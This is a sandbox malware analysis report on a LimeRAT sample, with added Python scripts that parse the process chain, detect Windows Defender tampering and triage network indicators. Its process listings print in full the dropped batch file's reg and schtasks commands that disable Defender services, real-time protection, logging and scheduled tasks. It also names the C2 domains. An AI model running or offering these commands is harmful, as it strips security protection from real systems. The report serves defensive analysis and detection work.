Malware Analysis Report

2024-11-16 13:10

Sample ID 220524-q1fgzsgdcr
Target 8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac
SHA256 8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac
Tags
limerat rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac

Threat Level: Known bad

The file 8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac was found to be: Known bad.

Malicious Activity Summary

limerat rat

LimeRAT

Executes dropped EXE

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-05-24 13:43

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-05-24 13:43

Reported

2022-05-24 13:51

Platform

win7-20220414-en

Max time kernel

4s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe"

Signatures

LimeRAT

rat limerat

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe N/A

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target (identical rows collapsed; number of writes in parentheses)
PID 532 wrote to memory of 952 (4 writes) N/A C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe
PID 952 wrote to memory of 1408 (4 writes) N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe C:\Windows\system32\cmd.exe
PID 1408 wrote to memory of 1792 (3 writes) N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1408 wrote to memory of 1272 (3 writes) N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
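Each row above is one cross-process write; grouping them by (writer, target) gives the process chain of this run: the sample spawns RarSFX0\avdisable.exe, which spawns cmd.exe, which spawns two reg.exe instances. Every link is a parent writing into a child it has just started, something ordinary process creation can also produce, so on their own these rows are weak evidence of code injection; their value in this report is the chain they document. The Python below is an added example, not output of the sandbox; it parses rows in the shape printed above (the sample rows are constructed inline from this table, repeats included), collapses the repeats, and rebuilds the chain with the write count on each edge.

```python
"""Rebuild the process chain from 'wrote to memory of' rows of a sandbox report."""
import ntpath
import re
from collections import defaultdict

ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) \S+ (\S+) (\S+)$")

# Constructed sample input in the exact shape of the behavioral1 rows above
# (Description, Indicator, Process, Target), including the repeated rows.
SAMPLE_EXE = r"C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe"
AVDISABLE = r"C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe"
CMD = r"C:\Windows\system32\cmd.exe"
REG = r"C:\Windows\system32\reg.exe"
SAMPLE_ROWS = "\n".join(
    [f"PID 532 wrote to memory of 952 N/A {SAMPLE_EXE} {AVDISABLE}"] * 4
    + [f"PID 952 wrote to memory of 1408 N/A {AVDISABLE} {CMD}"] * 4
    + [f"PID 1408 wrote to memory of 1792 N/A {CMD} {REG}"] * 3
    + [f"PID 1408 wrote to memory of 1272 N/A {CMD} {REG}"] * 3
)


def parse_rows(text):
    """One (writer_pid, target_pid, writer_image, target_image) tuple per row."""
    events = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            events.append((int(m[1]), int(m[2]), m[3], m[4]))
    return events


def build_tree(events):
    """Collapse repeats into writer -> {target: write_count}; also map pid -> image."""
    images, edges = {}, defaultdict(dict)
    for src, dst, src_img, dst_img in events:
        images[src], images[dst] = src_img, dst_img
        edges[src][dst] = edges[src].get(dst, 0) + 1
    return images, dict(edges)


def roots(tree):
    """PIDs that were never written to: the top of each chain."""
    images, edges = tree
    targets = {dst for dsts in edges.values() for dst in dsts}
    return sorted(pid for pid in images if pid not in targets)


def label(tree, pid):
    """Image basename plus PID, e.g. 'cmd.exe[1408]'."""
    return f"{ntpath.basename(tree[0][pid])}[{pid}]"


def chains(tree):
    """Every root-to-leaf path as 'a.exe[1] > b.exe[2] > c.exe[3]'."""
    edges = tree[1]
    out = []

    def walk(pid, path):
        path = path + [label(tree, pid)]
        if pid not in edges:
            out.append(" > ".join(path))
        for child in edges.get(pid, {}):
            walk(child, path)

    for root in roots(tree):
        walk(root, [])
    return out


def render(tree):
    """Indented tree with the number of writes recorded on each edge."""
    edges = tree[1]
    lines = []

    def walk(pid, depth, note):
        lines.append("  " * depth + label(tree, pid) + note)
        for child, n in edges.get(pid, {}).items():
            walk(child, depth + 1, f"  <- {n} write(s) from PID {pid}")

    for root in roots(tree):
        walk(root, 0, "")
    return lines


if __name__ == "__main__":
    print("\n".join(render(build_tree(parse_rows(SAMPLE_ROWS)))))
```

The same parser works on the behavioral2 run once its rows are supplied; there the report records no WriteProcessMemory signature at all, so the chain has to be read from the Processes list instead.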

Processes

C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe

"C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe"

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exe

PayPal-Restore.exe -dC:\Users\Admin\AppData\Local\Temp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\opener.bat" "

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\234A.tmp\234B.tmp\234C.bat C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe"
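The reg.exe and schtasks.exe lines above are the contents of the batch file that avdisable.exe drops into a nested .tmp directory (234C.bat in this run, 76DC.bat in behavioral2, both with MD5 8760b15c6d12ecc70594fc8db876c68c) and runs through the 64-bit cmd via the sysnative alias. Every one of them tampers with Windows Defender: the WinDefend service and the WdNisSvc, WdNisDrv, WdFilter and WdBoot drivers are set to Start=4 (SERVICE_DISABLED), the policy values under HKLM\Software\Policies\Microsoft\Windows Defender are written and the policy key is also deleted outright, the DefenderApiLogger and DefenderAuditLogger ETW autologgers are set to Start=0, the Defender and ExploitGuard scheduled tasks are disabled, and the EPP shell-extension handler and the SecurityHealth autorun are removed. The Python below is an added detection example, not part of the report or of the sample: it normalises reg/schtasks command lines as a process-creation log would carry them (the list is constructed from the lines above plus two benign commands that must not fire), and maps each hit to ATT&CK T1562.001 (Impair Defenses: Disable or Modify Tools), or T1562.006 (Indicator Blocking) for the autologger writes. The rule wording and the choice to flag any reg.exe write under the Defender policy root (Group Policy, not reg.exe, normally writes there) are this example's assumptions.

```python
"""Flag Windows Defender tampering in reg.exe / schtasks.exe command lines."""
import re

TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')
SERVICES_ROOT = "hklm\\system\\currentcontrolset\\services\\"
AUTOLOGGER_ROOT = "hklm\\system\\currentcontrolset\\control\\wmi\\autologger\\defender"
POLICY_ROOT = "hklm\\software\\policies\\microsoft\\windows defender"
DEFENDER_SERVICES = {"windefend", "wdnissvc", "wdnisdrv", "wdfilter", "wdboot"}
DEFENDER_TASK_ROOTS = ("microsoft\\windows\\windows defender\\",
                       "microsoft\\windows\\exploitguard\\")


def tokenize(cmdline):
    """Split a cmd.exe-style command line, honouring double quotes only."""
    return [quoted or bare for quoted, bare in TOKEN_RE.findall(cmdline)]


def parse(cmdline):
    """Normalise a reg.exe or schtasks.exe invocation; None for anything else."""
    t = tokenize(cmdline)
    if not t:
        return None
    exe = t[0].rsplit("\\", 1)[-1].lower()
    exe = exe[:-4] if exe.endswith(".exe") else exe
    low = [x.lower() for x in t]
    if exe == "reg" and len(t) >= 3 and low[1] in ("add", "delete"):
        opts = {low[i]: t[i + 1] for i in range(3, len(t) - 1) if low[i] in ("/v", "/t", "/d")}
        return {"tool": "reg", "op": low[1], "key": low[2],
                "value": opts.get("/v", "").lower(), "data": opts.get("/d")}
    if exe == "schtasks" and "/change" in low:
        i = low.index("/tn") if "/tn" in low else -1
        task = t[i + 1].lower() if 0 <= i < len(t) - 1 else None
        return {"tool": "schtasks", "op": "disable" if "/disable" in low else "change", "task": task}
    return None


def classify(p):
    """Return (rule, ATT&CK id) when the parsed command tampers with Defender."""
    if p is None:
        return None
    if p["tool"] == "reg":
        key, op, val, data = p["key"], p["op"], p["value"], p["data"]
        leaf = key.rsplit("\\", 1)[-1]
        if op == "add" and key.startswith(SERVICES_ROOT) and leaf in DEFENDER_SERVICES \
                and val == "start" and data == "4":
            return (f"Defender service/driver {leaf} set to SERVICE_DISABLED (Start=4)", "T1562.001")
        if op == "add" and key.startswith(AUTOLOGGER_ROOT) and val == "start" and data == "0":
            return (f"Defender ETW autologger {leaf} switched off", "T1562.006")
        if key.startswith(POLICY_ROOT):  # assumption: reg.exe never legitimately writes here
            if op == "delete" and not val:
                return ("Defender policy key deleted outright", "T1562.001")
            return (f"Defender policy override {val}={data}", "T1562.001")
        if op == "delete" and key.endswith("\\shellex\\contextmenuhandlers\\epp"):
            return ("Defender shell context-menu handler (EPP) removed", "T1562.001")
        if op == "delete" and val == "securityhealth":
            return ("SecurityHealth autorun removed", "T1562.001")
    elif p["tool"] == "schtasks" and p["op"] == "disable" and p["task"]:
        if p["task"].startswith(DEFENDER_TASK_ROOTS):
            return (f"Defender scheduled task disabled: {p['task']}", "T1562.001")
    return None


def scan(cmdlines):
    """All findings as dicts with the offending command line, rule and technique."""
    findings = []
    for c in cmdlines:
        hit = classify(parse(c))
        if hit:
            findings.append({"cmd": c, "rule": hit[0], "technique": hit[1]})
    return findings


def summarize(findings):
    """Finding count per ATT&CK technique id."""
    counts = {}
    for f in findings:
        counts[f["technique"]] = counts.get(f["technique"], 0) + 1
    return counts


# Constructed sample: a subset of the lines in the report above, plus three
# commands that must NOT fire (a non-Defender service, a non-Defender task,
# and the avdisable.exe launch itself, which is not a reg/schtasks call).
SAMPLE_CMDLINES = [
    r'reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f',
    r'reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f',
    r'reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f',
    r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f',
    r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f',
    r'reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f',
    r'reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f',
    r'reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f',
    r'schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable',
    r'schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable',
    r'reg add "HKLM\System\CurrentControlSet\Services\ContosoAgent" /v "Start" /t REG_DWORD /d "4" /f',
    r'schtasks /Change /TN "Microsoft\Windows\Defrag\ScheduledDefrag" /Disable',
    r'"C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f["technique"], f["rule"])
    print(summarize(scan(SAMPLE_CMDLINES)))
```

Two points matter when turning this into a production rule. Registry paths and task names are case-insensitive, so everything is lower-cased before comparison; and the benign controls show why the service rule keys on the Defender service names rather than on Start=4 alone, since disabling an unrelated service with the same command shape is routine administration.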

Network

Country  Destination           Domain                  Proto
US       93.184.220.29:80      -                       tcp
US       93.184.220.29:80      -                       tcp
CN       101.226.28.203:80     -                       tcp
US       93.184.220.29:80      -                       tcp
CN       101.226.28.184:80     -                       tcp
US       204.79.197.200:443    -                       tcp
US       8.8.8.8:53            pastebin.com            udp
US       104.20.67.143:443     pastebin.com            tcp
US       8.8.8.8:53            magicbox3317.ddns.net   udp
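The table mixes resolver queries (UDP/53 rows that carry a domain) with the connections that followed, and the first question for anyone turning it into indicators is which hosts were actually talked to. The Python below is an added example, not output of the sandbox; it parses rows in the shape printed above (the sample is constructed inline from this table), separates lookups from connections, lists hosts that were only resolved, and flags domains on an assumed, illustrative list of paste and dynamic-DNS services. On this run it shows that pastebin.com was both resolved and connected to on 443, matching the "Legitimate hosting services abused for malware hosting/C2" signature, while magicbox3317.ddns.net was resolved but no connection to it appears, so the address behind that name is not recoverable from this report.

```python
"""Triage the Network table of a sandbox report: lookups vs. connections."""
import re

NET_RE = re.compile(r"^([A-Z]{2})\s+([\d.]+):(\d+)\s+(?:(\S+)\s+)?(tcp|udp)$")

# Constructed sample input: the behavioral1 Network rows above, as printed.
SAMPLE_NETWORK = """
Country Destination Domain Proto
US 93.184.220.29:80 tcp
US 93.184.220.29:80 tcp
CN 101.226.28.203:80 tcp
US 93.184.220.29:80 tcp
CN 101.226.28.184:80 tcp
US 204.79.197.200:443 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 magicbox3317.ddns.net udp
"""

# Illustrative, not exhaustive, suffixes of services commonly abused to host
# configuration or C2 addresses; this list is an assumption of the example.
ABUSED_SUFFIXES = {"pastebin.com": "paste site", "ddns.net": "dynamic DNS",
                   "no-ip.org": "dynamic DNS", "duckdns.org": "dynamic DNS"}


def parse_network(text):
    """One dict per data row; the header, blank lines and a '-' domain are skipped."""
    records = []
    for line in text.splitlines():
        m = NET_RE.match(line.strip())
        if not m:
            continue
        domain = m[4] if m[4] and m[4] != "-" else None
        records.append({"country": m[1], "ip": m[2], "port": int(m[3]),
                        "domain": domain, "proto": m[5]})
    return records


def is_lookup(r):
    """A UDP/53 row with a domain is a resolver query, not a session with the host."""
    return r["proto"] == "udp" and r["port"] == 53 and r["domain"] is not None


def resolved_domains(records):
    return {r["domain"] for r in records if is_lookup(r)}


def resolved_not_contacted(records):
    """Domains that were looked up but never appear on a non-DNS connection."""
    contacted = {r["domain"] for r in records if not is_lookup(r) and r["domain"]}
    return sorted(resolved_domains(records) - contacted)


def abused_hosting(records):
    """domain -> service kind for every domain matching ABUSED_SUFFIXES."""
    hits = {}
    for d in sorted({r["domain"] for r in records if r["domain"]}):
        for suffix, kind in ABUSED_SUFFIXES.items():
            if d == suffix or d.endswith("." + suffix):
                hits[d] = kind
    return hits


def connections(records):
    """Unique ip:port pairs that were actually connected to (DNS rows excluded)."""
    return sorted({f'{r["ip"]}:{r["port"]}' for r in records if not is_lookup(r)})


if __name__ == "__main__":
    recs = parse_network(SAMPLE_NETWORK)
    print("resolved only:", resolved_not_contacted(recs))
    print("abused hosting:", abused_hosting(recs))
    print("connections:", connections(recs))
```

The behavioral2 run (Windows 10) shows a single connection and no DNS rows at all, so the same code returns nothing for it; that gap, not the Windows 7 result, is the one to remember when the two runs are compared.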

Files

Note: the dropped path RarSFX0\avdisable.exe is listed below with several different hash sets within this one run. Before using any of them as an indicator, confirm which set belongs to the fully written file; a sandbox that records a file more than once while it is still being written produces exactly this pattern.

memory/532-54-0x0000000075711000-0x0000000075713000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe

MD5 2b9eee13a0e979e7cce3cbd274386be9
SHA1 f7ac238066df9d83add932190055185a59d015d2
SHA256 2b552c6f59b52970e7c86ebe757293d57af3a1f5260b52744773edb5772e0576
SHA512 038caa0f92a17f8e9b3c56cc8afcde172703f28e0f0eb76a81cacc89290055f0343b1d6d1cb777e4673550bd4f5cc8ca9a8e4bc8bd32c9bb10d47bb2767cc0ed

C:\Users\Admin\AppData\Local\Temp\234A.tmp\234B.tmp\234C.bat

MD5 8760b15c6d12ecc70594fc8db876c68c
SHA1 b1d47a27bf45db9955f07c773a5a334e3b528a97
SHA256 9a3d9f84626d1443b0e1fc1afe22cc4045c20714b98838e94542991039cf8463
SHA512 0463204ebabf6465ba3be44b31dc235ba240f1899b41336655a3f361932b8225326d8ab7c53130d4ded9412193d5967f805221212b964d6a54492d0f2c331dee

memory/2020-65-0x0000000000000000-mapping.dmp

memory/2044-68-0x0000000000000000-mapping.dmp

memory/1628-71-0x0000000000000000-mapping.dmp

memory/1156-74-0x0000000000000000-mapping.dmp

memory/1684-78-0x0000000000000000-mapping.dmp

memory/688-79-0x0000000000000000-mapping.dmp

memory/1964-81-0x0000000000000000-mapping.dmp

memory/1772-83-0x0000000000000000-mapping.dmp

memory/1508-86-0x0000000000000000-mapping.dmp

memory/1960-89-0x0000000000000000-mapping.dmp

memory/1616-92-0x0000000000000000-mapping.dmp

memory/2028-91-0x0000000000000000-mapping.dmp

memory/1932-93-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\opener.bat

MD5 76b34b8a915e15e32871820b24a60556
SHA1 aabf1487a5dc1880d5c8a6979666b215dc09a837
SHA256 ff8a34a62c2f4b7b5c058f67cfbbe5df9e74541f909a3b7f8c9fc8155b72d7a1
SHA512 2c0d801537d7576ab03b1eda1b0c60eb41525b4bd57b1a77a383b83dd49d20327b16162c7721c0e7b635734f6d96ffa4290dafc6350917ffa7114780d1716ffb

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exe

MD5 9f150fdb9779485a9b4af5875a48aaf7
SHA1 47e2d38e7c69a8e7f0e2993f3f8cb131483aa97f
SHA256 981c27f97402dab365ed009cff2ab23946424a8f0b1d31f080c1e8675434434a
SHA512 b4e94b127f75afb8fcc3d9555ecc608141b27e81755d3b9ffe0ef8632a7594806564f3e5a6dbbc2869b77c11d4570afc7b167440bcdf6f49934f2b4dbb4357df

memory/588-97-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exe

MD5 9f150fdb9779485a9b4af5875a48aaf7
SHA1 47e2d38e7c69a8e7f0e2993f3f8cb131483aa97f
SHA256 981c27f97402dab365ed009cff2ab23946424a8f0b1d31f080c1e8675434434a
SHA512 b4e94b127f75afb8fcc3d9555ecc608141b27e81755d3b9ffe0ef8632a7594806564f3e5a6dbbc2869b77c11d4570afc7b167440bcdf6f49934f2b4dbb4357df

C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe

MD5 54a1574cacf95b6c5c9c597d8d76de45
SHA1 4879d75f50d747a400c03ab9700e816ec0607fe6
SHA256 67f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1
SHA512 869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f

memory/904-104-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe

MD5 54a1574cacf95b6c5c9c597d8d76de45
SHA1 4879d75f50d747a400c03ab9700e816ec0607fe6
SHA256 67f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1
SHA512 869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f

memory/904-107-0x0000000000940000-0x000000000095A000-memory.dmp

memory/1000-90-0x0000000000000000-mapping.dmp

memory/432-88-0x0000000000000000-mapping.dmp

memory/1596-87-0x0000000000000000-mapping.dmp

memory/1468-85-0x0000000000000000-mapping.dmp

memory/1812-84-0x0000000000000000-mapping.dmp

memory/1992-82-0x0000000000000000-mapping.dmp

memory/452-80-0x0000000000000000-mapping.dmp

memory/944-77-0x0000000000000000-mapping.dmp

memory/1732-76-0x0000000000000000-mapping.dmp

memory/1736-75-0x0000000000000000-mapping.dmp

memory/1196-73-0x0000000000000000-mapping.dmp

memory/1740-72-0x0000000000000000-mapping.dmp

memory/676-70-0x0000000000000000-mapping.dmp

memory/564-69-0x0000000000000000-mapping.dmp

memory/1008-67-0x0000000000000000-mapping.dmp

memory/2036-66-0x0000000000000000-mapping.dmp

memory/1272-64-0x0000000000000000-mapping.dmp

memory/1792-63-0x0000000000000000-mapping.dmp

memory/1408-61-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe

MD5 b644afe28f2368af7da90246d13bce4a
SHA1 cd24a837643a47a240c7402592f47ba2e4a978b0
SHA256 e522c2e61f111716eb1b89ab6daf113c9537464f3dafc89a111e60bf6f1d84e5
SHA512 1dd0e33a4bceb3811565fc503e5d12c9bfa0f6687b94ad3232af1cd4bd092ea4759b0d82b3728f1ef203cd902ec1d5ac34fda25b167e001270524280f6a96d90

memory/952-58-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe

MD5 fe4788726b2255e2aa33654f90e7f731
SHA1 da0181a736a57f57022d241e58fc6f4c25cec755
SHA256 9b0889135e08318e0f310913bac7ef86ed1af884ec460c11a66c7190195961a9
SHA512 550c50506d5adcfdf22d9c4252e8ad35ccd6eadb02a18185dd2fb7edab57a5e49c99d87ce5c7b9127d94131a71d513481cf0badd36630ed2c3e3ae6743429f33

\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe

MD5 31120f8f17f419583be650465cde8f50
SHA1 fe3ea43bb6b214d4e8e32f879811f6a7016d57e5
SHA256 a7b1756b3578853214a128219c0c005959b39c7105e5eb09b4484caeb877cd61
SHA512 6b80e28890aaeb963abe721eb020ab5ea336974a6be563cb9ada5648a4db074895a42f27591429e99a57e402a587699938724a20ef60c232e6bb8475f4bfee80

Analysis: behavioral2

Detonation Overview

Submitted

2022-05-24 13:43

Reported

2022-05-24 13:51

Platform

win10v2004-20220414-en

Max time kernel

5s

Max time network

28s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe"

Signatures

LimeRAT

rat limerat

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe

"C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe"

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exe

PayPal-Restore.exe -dC:\Users\Admin\AppData\Local\Temp

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\opener.bat" "

C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe"

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

